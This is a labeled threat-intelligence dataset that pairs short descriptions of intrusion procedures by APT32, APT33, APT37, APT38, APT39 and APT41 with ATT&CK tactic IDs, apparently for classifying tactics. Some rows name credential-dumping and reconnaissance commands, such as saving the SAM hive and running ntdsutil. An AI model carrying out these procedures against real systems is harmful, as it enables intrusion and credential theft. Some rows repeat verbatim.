APT32 has set up and operated websites to gather information and deliver malware.,['TA0042:Resource Development']
APT32 has infected victims by tricking them into visiting compromised watering hole websites.,['TA0001:Initial Access']
"APT32 has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.",['TA0042:Resource Development']
APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.,['TA0043:Reconnaissance']
"APT32 has performed code obfuscation, including encoding payloads using Base64 and using a framework called ""Dont-Kill-My-Cat . APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.",['TA0005:Defense Evasion']
APT32's backdoor has exfiltrated data using the already opened channel with its C&C server.,['TA0010:Exfiltration']
APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.,['TA0010:Exfiltration']
APT32 has used RTF document that includes an exploit to execute malicious code. ,['TA0002:Execution']
APT32 has used CVE-2016-7255 to escalate privileges.,['TA0004:Privilege Escalation']
APT32's macOS backdoor can receive a “delete” command.,['TA0005:Defense Evasion']
APT32's backdoor possesses the capability to list files and directories on a machine.,['TA0007:Discovery']
APT32's backdoor has stored its configuration in a registry key.,['TA0005:Defense Evasion']
APT32 has conducted targeted surveillance against activists and bloggers.,['TA0043:Reconnaissance']
APT32's macOS backdoor hides the clientID file via a chflags function.,['TA0005:Defense Evasion']
APT32 has used the WindowStyle parameter to conceal PowerShell windows.,['TA0005:Defense Evasion']
APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.,['TA0011:Command and Control']
APT32 has used JavaScript for drive-by downloads and C2 communications.,['TA0002:Execution']
APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.,['TA0006:Credential Access']
APT32 has deployed tools after moving laterally using administrative accounts.,['TA0008:Lateral Movement']
APT32's macOS backdoor changes the permission of the file it wants to execute to 755.,['TA0005:Defense Evasion']
APT32 enumerated administrative users using the commands net localgroup administrators.,['TA0007:Discovery']
APT32 has used legitimate local admin account credentials.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT32 has used email for C2 via an Office macro.,['TA0011:Command and Control']
APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.,['TA0002:Execution']
APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.,['TA0002:Execution']
"APT32 has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. APT32 has also impersonated the legitimate Flash installer file name ""install_flashplayer.exe"".",['TA0005:Defense Evasion']
APT32 has disguised a Cobalt Strike beacon as a Flash Installer.,['TA0005:Defense Evasion']
APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.,['TA0005:Defense Evasion']
APT32's backdoor has modified the Windows Registry to store the backdoor's configuration.,['TA0005:Defense Evasion']
APT32 has used mshta.exe for code execution.,['TA0005:Defense Evasion']
APT32 used NTFS alternate data streams to hide their payloads.,['TA0005:Defense Evasion']
"APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.",['TA0007:Discovery']
"APT32 used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$.",['TA0007:Discovery']
An APT32 backdoor can use HTTP over a non-standard TCP port which is specified in the backdoor configuration.,['TA0011:Command and Control']
APT32 used GetPassword_x64 to harvest credentials.,['TA0006:Credential Access']
APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.,['TA0003:Persistence']
APT32 has used pass the hash for lateral movement.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
APT32 successfully gained remote access by using pass the ticket.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
"APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.",['TA0002:Execution']
APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.",['TA0005:Defense Evasion']
APT32's backdoor can query the Windows Registry to gather system information.,['TA0007:Discovery']
"APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.,['TA0005:Defense Evasion']
"APT32 has enumerated DC servers using the command net group ""Domain Controllers"" /domain. The group has also used the ping command.",['TA0007:Discovery']
APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.,['TA0005:Defense Evasion']
APT32 malware has used rundll32.exe to execute an initial infection process.,['TA0005:Defense Evasion']
APT32 used Net to use Windows' hidden network shares to copy their tools to remote machines for execution.,['TA0008:Lateral Movement']
APT32 has used scheduled tasks to persist on victim systems.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT32's backdoor has used Windows services as a way to execute its malicious payload.,['TA0002:Execution']
APT32 has set up Facebook pages in tandem with fake websites.,['TA0042:Resource Development']
APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.,"['TA0002:Execution', 'TA0008:Lateral Movement']"
APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.,['TA0001:Initial Access']
APT32 has sent spearphishing emails containing malicious links.,['TA0001:Initial Access']
APT32 has used malicious links to direct users to web pages designed to harvest credentials.,['TA0043:Reconnaissance']
"APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host.",['TA0007:Discovery']
APT32 used the ipconfig /all command to gather the IP address from the system.,['TA0007:Discovery']
APT32 used the netstat -anpo tcp command to display TCP connections on the victim's machine.,['TA0007:Discovery']
APT32 collected the victim's username and executed the whoami command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine.,['TA0007:Discovery']
"APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.",['TA0005:Defense Evasion']
"APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.",['TA0042:Resource Development']
"APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.",['TA0042:Resource Development']
"APT32 has used macros, COM scriptlets, and VBS scripts.",['TA0002:Execution']
APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.,['TA0011:Command and Control']
"APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.",['TA0011:Command and Control']
"APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.",['TA0042:Resource Development']
APT32 has used Web shells to maintain access to victim websites.,['TA0003:Persistence']
APT32 has used cmd.exe for execution.,['TA0002:Execution']
APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.,['TA0002:Execution']
APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT33 has used WinRAR to compress data prior to exfil.,['TA0009:Collection']
APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,['TA0006:Credential Access']
APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,['TA0006:Credential Access']
APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,['TA0006:Credential Access']
APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,['TA0006:Credential Access']
APT33 has used base64 to encode payloads.,['TA0005:Defense Evasion']
APT33 has used FTP to exfiltrate files .,['TA0010:Exfiltration']
"APT33 has attempted to exploit a known vulnerability in WinRAR , and attempted to gain remote code execution via a security bypass vulnerability .",['TA0002:Execution']
APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.,['TA0004:Privilege Escalation']
APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.,['TA0006:Credential Access']
APT33 has downloaded additional files and programs from its C2 server.,['TA0011:Command and Control']
APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,['TA0006:Credential Access']
"APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, and ProcDump to dump credentials.",['TA0006:Credential Access']
APT33 has used malicious e-mail attachments to lure victims into executing malware.,['TA0002:Execution']
APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.,['TA0002:Execution']
APT33 has used SniffPass to collect credentials by sniffing network traffic.,"['TA0006:Credential Access', 'TA0007:Discovery']"
APT33 has used HTTP over TCP ports 808 and 880 for command and control.,['TA0011:Command and Control']
APT33 has used password spraying to gain access to target systems.,['TA0006:Credential Access']
APT33 has utilized PowerShell to download files from the C2 server and run various scripts.,['TA0002:Execution']
"APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT33 has created a scheduled task to execute a .vbe file multiple times a day.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT33 has sent spearphishing e-mails with archive attachments.,['TA0001:Initial Access']
APT33 has sent spearphishing emails containing links to .hta files.,['TA0001:Initial Access']
APT33 has used base64 to encode command and control traffic.,['TA0011:Command and Control']
APT33 has used AES for encryption of command and control traffic.,['TA0011:Command and Control']
APT33 has obtained and leveraged publicly-available tools for early intrusion activities.,['TA0042:Resource Development']
APT33 has used valid accounts for initial access and privilege escalation.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT33 has used VBScript to initiate the delivery of payloads.,['TA0002:Execution']
APT33 has used HTTP for command and control.,['TA0011:Command and Control']
APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input.,['TA0009:Collection']
APT37 leverages social networking sites and cloud platforms for C2.,['TA0011:Command and Control']
APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT37 has used Ruby scripts to execute payloads.,['TA0002:Execution']
APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.,['TA0006:Credential Access']
APT37 has collected data from victims' local systems.,['TA0009:Collection']
APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record .,['TA0040:Impact']
"APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.",['TA0001:Initial Access']
APT37 has used Windows DDE for execution of commands and a malicious VBS.,['TA0002:Execution']
"APT37 has used exploits for Flash Player , Word , Internet Explorer , and Microsoft Edge for execution.",['TA0002:Execution']
APT37 has downloaded second stage malware from compromised websites.,['TA0011:Command and Control']
APT37 has signed its malware with an invalid digital certificates listed as “Tencent Technology Company Limited.”,['TA0005:Defense Evasion']
APT37 has sent spearphishing attachments attempting to get a user to open them.,['TA0002:Execution']
"APT37 leverages the Windows API calls: VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.",['TA0002:Execution']
APT37 obfuscates strings and payloads.,['TA0005:Defense Evasion']
"APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.",['TA0007:Discovery']
APT37's Freenki malware lists running processes using the Microsoft Windows API.,['TA0007:Discovery']
"APT37 injects its malware variant, ROKRAT, into the cmd.exe process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT37 has used Python scripts to execute payloads.,['TA0002:Execution']
APT37's has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT37 has created scheduled tasks to run malicious scripts on a compromised host.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT37 delivers malware using spearphishing emails with malicious HWP attachments.,['TA0001:Initial Access']
APT37 uses steganography to send images to users that are embedded with shellcode.,['TA0005:Defense Evasion']
"APT37 collects the computer name, the BIOS model, and execution path.",['TA0007:Discovery']
APT37 identifies the victim username.,['TA0007:Discovery']
APT37 has used malware that will issue the command shutdown /r /t 1 to reboot a system after wiping its MBR.,['TA0040:Impact']
APT37 executes shellcode and a VBA script to decode Base64 strings.,['TA0002:Execution']
APT37 uses HTTPS to conceal C2 communications.,['TA0011:Command and Control']
APT37 has used the command-line interface.,['TA0002:Execution']
"APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.",['TA0007:Discovery']
APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.,['TA0006:Credential Access']
APT38 clears Window Event logs and Sysmon logs from the system.,['TA0005:Defense Evasion']
APT38 used a Trojan called KEYLIME to collect data from the clipboard.,['TA0009:Collection']
APT38 has used CHM files to move concealed payloads.,['TA0005:Defense Evasion']
APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT38 has used a custom secure delete function to make deleted files unrecoverable.,['TA0040:Impact']
APT38 has used Hermes ransomware to encrypt files with AES256.,['TA0040:Impact']
APT38 has collected data from a compromised host.,['TA0009:Collection']
"APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.",['TA0005:Defense Evasion']
APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.,['TA0040:Impact']
APT38 has conducted watering holes schemes to gain initial access to victims.,['TA0001:Initial Access']
"APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.",['TA0005:Defense Evasion']
"APT38 have enumerated files and directories, or searched in specific locations within a compromised host.",['TA0007:Discovery']
APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.,['TA0005:Defense Evasion']
"APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.",['TA0011:Command and Control']
APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT38 has attempted to lure victims into enabling malicious macros within email attachments.,['TA0002:Execution']
APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys.,['TA0005:Defense Evasion']
APT38 has used the Windows API to execute code within a victim's system.,['TA0002:Execution']
APT38 has enumerated network shares on a compromised host.,['TA0007:Discovery']
APT38 has used PowerShell to execute commands and other operational tasks.,['TA0002:Execution']
"APT38 leveraged Sysmon to understand the processes, services in the organization.",['TA0007:Discovery']
"APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.",['TA0005:Defense Evasion']
APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.,['TA0040:Impact']
APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.",['TA0007:Discovery']
"APT38 has created new services or modified existing ones to run executables, commands, or scripts.",['TA0002:Execution']
"APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.",['TA0005:Defense Evasion']
APT38 has conducted spearphishing campaigns using malicious email attachments.,['TA0001:Initial Access']
"APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.",['TA0040:Impact']
"APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.",['TA0007:Discovery']
"APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.",['TA0007:Discovery']
"APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.",['TA0007:Discovery']
"APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.",['TA0040:Impact']
APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.,['TA0005:Defense Evasion']
APT38 has obtained and used open-source tools such as Mimikatz.,['TA0042:Resource Development']
APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.,['TA0040:Impact']
APT38 has used VBScript to execute commands and other operational tasks.,['TA0002:Execution']
"APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.",['TA0011:Command and Control']
APT38 has used web shells for persistence or to ensure redundant access.,['TA0003:Persistence']
"APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.",['TA0002:Execution']
APT38 has installed a new Windows service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT39 has used malware to set LoadAppInit_DLLs in the Registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows in order to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT39 has used WinRAR and 7-Zip to compress an archive stolen data.,['TA0009:Collection']
APT39 has utilized AutoIt malware scripts embedded in Microsoft Office documents or malicious links.,['TA0002:Execution']
APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.,['TA0011:Command and Control']
APT39 has used Ncrack to reveal credentials.,['TA0006:Credential Access']
APT39 has used tools capable of stealing contents of the clipboard.,['TA0009:Collection']
APT39 has used malware to turn off the RequireSigned feature which ensures only signed DLLs can be run on Windows.,['TA0005:Defense Evasion']
APT39 has utilized custom scripts to perform internal reconnaissance.,['TA0002:Execution']
APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.,['TA0006:Credential Access']
APT39 has used remote access tools that leverage DNS in communications with C2.,['TA0011:Command and Control']
APT39 has used various tools to steal files from the compromised host.,['TA0009:Collection']
APT39 has used malware to decrypt encrypted CAB files.,['TA0005:Defense Evasion']
APT39 has used malware to drop encrypted CAB files.,['TA0005:Defense Evasion']
APT39 has exfiltrated stolen victim data through C2 communications.,['TA0010:Exfiltration']
APT39 has used SQL injection for initial compromise.,['TA0001:Initial Access']
APT39 has used various tools to proxy C2 communications.,['TA0011:Command and Control']
APT39 has used malware to delete files after they are deployed on a compromised host.,['TA0005:Defense Evasion']
APT39 has used tools with the ability to search for files on a compromised host.,['TA0007:Discovery']
APT39 has downloaded tools to compromised hosts.,['TA0011:Command and Control']
APT39 has utilized tools to capture mouse movements.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.,['TA0011:Command and Control']
APT39 has used tools for capturing keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
"APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.",['TA0006:Credential Access']
APT39 has created accounts on multiple compromised hosts to perform actions within the network.,['TA0003:Persistence']
APT39 has utilized tools to aggregate data prior to exfiltration.,['TA0009:Collection']
APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.,['TA0002:Execution']
APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.,['TA0002:Execution']
"APT39 has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.",['TA0005:Defense Evasion']
APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.,['TA0007:Discovery']
APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.,['TA0007:Discovery']
APT39 has used different versions of Mimikatz to obtain credentials.,['TA0006:Credential Access']
APT39 has used PowerShell to execute malicious code.,['TA0002:Execution']
APT39 has used a command line utility and a network scanner written in python.,['TA0002:Execution']
APT39 has used various strains of malware to query the Registry.,['TA0007:Discovery']
APT39 has maintained persistence using the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT39 has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.",['TA0008:Lateral Movement']
APT39 has used NBTscan and custom tools to discover remote systems.,['TA0007:Discovery']
APT39 has used SMB for lateral movement.,['TA0008:Lateral Movement']
APT39 used secure shell to move laterally among their targets.,['TA0008:Lateral Movement']
APT39 has created scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT39 has used a screen capture utility to take screenshots on a compromised host.,['TA0009:Collection']
APT39 has used post-exploitation tools including RemCom and the Non-sucking Service Manager to execute processes.,['TA0002:Execution']
APT39 has modified LNK shortcuts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection.",['TA0005:Defense Evasion']
APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.,['TA0001:Initial Access']
APT39 leveraged spearphishing emails with malicious links to initially compromise victims.,['TA0001:Initial Access']
APT39 used Remexi to collect usernames from the system.,['TA0007:Discovery']
APT39 has modified and used customized versions of publicly-available tools like PLINK and Mimikatz.,['TA0042:Resource Development']
APT39 has used stolen credentials to compromise Outlook Web Access .,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT39 has utilized malicious VBS scripts in malware.,['TA0002:Execution']
APT39 has used HTTP in communications with C2.,['TA0011:Command and Control']
APT39 has installed ANTAK and ASPXSPY web shells.,['TA0003:Persistence']
APT41 leveraged sticky keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 has added user accounts to the User and Admin groups.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT41 created a RAR archive of targeted files for exfiltration. Additionally, APT41 used the makecab.exe utility to both download tools, such as NATBypass, to the victim network and to archive a file for exfiltration.",['TA0009:Collection']
APT41 used BITSAdmin to download and install payloads.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
APT41 used a hidden shell script in `/etc/rc.d/init.d` to leverage the `ADORE.XSEC`backdoor and `Adore-NG` rootkit.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
APT41 performed password brute-force attacks on the local admin account.,['TA0006:Credential Access']
APT41 attempted to remove evidence of some of its activity by deleting Bash histories.,['TA0005:Defense Evasion']
APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.,['TA0005:Defense Evasion']
APT41 cloned victim user Git repositories during intrusions.,['TA0009:Collection']
APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.,['TA0005:Defense Evasion']
APT41 used compiled HTML files for targeting.,['TA0005:Defense Evasion']
"APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.",['TA0001:Initial Access']
APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.,['TA0040:Impact']
"APT41 has obtained information about accounts, lists of employees, and plaintext and hashed passwords from databases.",['TA0006:Credential Access']
"APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.",['TA0006:Credential Access']
"APT41 has used search order hijacking to execute malicious payloads, such as Winnti for Windows.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 used legitimate executables to perform DLL side-loading of their malware.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 used DNS for C2 communications.,['TA0011:Command and Control']
APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user. APT41 also used Microsoft Bitlocker to encrypt workstations and Jetico’s BestCrypt to encrypt servers.,['TA0040:Impact']
APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.,['TA0010:Exfiltration']
APT41 has uploaded files and data from a compromised host.,['TA0009:Collection']
"APT41 used legitimate websites for C2 through dead drop resolvers , including GitHub, Pastebin, and Microsoft TechNet.",['TA0011:Command and Control']
APT41 used built-in net commands to enumerate domain administrator users.,['TA0007:Discovery']
APT41 has used DGAs to change their C2 servers monthly.,['TA0011:Command and Control']
APT41 has configured payloads to load via LD_PRELOAD.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT41 has encrypted payloads using the Data Protection API , which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.",['TA0005:Defense Evasion']
"APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers and gateway devices. APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access. APT41 exploited CVE-2021-26855 against a vulnerable Microsoft Exchange Server to gain initial access to the victim network.",['TA0001:Initial Access']
"APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.",['TA0002:Execution']
APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.,"['TA0001:Initial Access', 'TA0003:Persistence']"
APT41 used the Steam community page as a fallback mechanism for C2.,['TA0011:Command and Control']
APT41 deleted files from the system.,['TA0005:Defense Evasion']
APT41 used exploit payloads that initiate download via ftp.,['TA0011:Command and Control']
"APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.",['TA0007:Discovery']
APT41 used scheduled tasks created via Group Policy Objects to deploy ransomware.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT41 impersonated an employee at a video game developer company to send phishing emails.,['TA0005:Defense Evasion']
"APT41 developed a custom injector that enables an Event Tracing for Windows bypass, making malicious processes invisible to Windows logging.",['TA0005:Defense Evasion']
APT41 used certutil to download additional files. APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access. APT41 has uploaded Procdump and NATBypass to a staging directory and has used these tools in follow-on activities.,['TA0011:Command and Control']
APT41 used a keylogger called GEARSHIFT on a target system.,"['TA0009:Collection', 'TA0006:Credential Access']"
"APT41 has used hashdump, Mimikatz, Procdump, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.",['TA0006:Credential Access']
APT41 uses remote shares to move and remotely execute payloads during lateral movemement.,['TA0008:Lateral Movement']
APT41 used built-in net commands to enumerate local administrator groups.,['TA0007:Discovery']
APT41 has created user accounts.,['TA0003:Persistence']
APT41 has created services to appear as benign system tools.,['TA0005:Defense Evasion']
APT41 attempted to masquerade their files as popular anti-virus software.,['TA0005:Defense Evasion']
APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.,['TA0005:Defense Evasion']
APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.,['TA0011:Command and Control']
APT41 used ntdsutil to obtain a copy of the victim environment ntds.dit file.,['TA0006:Credential Access']
APT41 used `NATBypass` to bypass firewall restrictions and to access compromised systems via RDP.,['TA0005:Defense Evasion']
APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.,['TA0007:Discovery']
APT41 used the net share command as part of network reconnaissance.,['TA0007:Discovery']
APT41 used VMProtected binaries in multiple intrusions.,['TA0005:Defense Evasion']
APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
APT41 used net group commands to enumerate various Windows user groups and permissions.,['TA0007:Discovery']
APT41 leveraged PowerShell to deploy malware families in victims’ environments.,['TA0002:Execution']
APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT41 used a tool called CLASSFON to covertly proxy network communications.,['TA0011:Command and Control']
APT41 queried registry values to determine items such as configured RDP ports and network configurations.,['TA0007:Discovery']
APT41 created and modified startup files for persistence. APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 used RDP for lateral movement. APT41 used NATBypass to expose local RDP ports on compromised systems to the Internet.,['TA0008:Lateral Movement']
APT41 has used MiPing to discover active systems in the victim network.,['TA0007:Discovery']
APT41 deployed rootkits on Linux systems.,['TA0005:Defense Evasion']
APT41 has used rundll32.exe to execute a loader.,['TA0005:Defense Evasion']
"APT41 has transferred implant files using Windows Admin Shares and the Server Message Block protocol, then executes files through Windows Management Instrumentation .",['TA0008:Lateral Movement']
"APT41 uses the Chinese website fofa.su, similar to the Shodan scanning service, for passive scanning of victims.",['TA0043:Reconnaissance']
APT41 used a compromised account to create a scheduled task on a system.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT41 extracted user account data from the Security Account Managerr , making a copy of this database from the registry using the reg save command or by exploiting volume shadow copies.",['TA0006:Credential Access']
APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.,['TA0002:Execution']
APT41 uses packers such as Themida to obfuscate malicious files.,['TA0005:Defense Evasion']
APT41 sent spearphishing emails with attachments such as compiled HTML files to initially compromise their victims.,['TA0001:Initial Access']
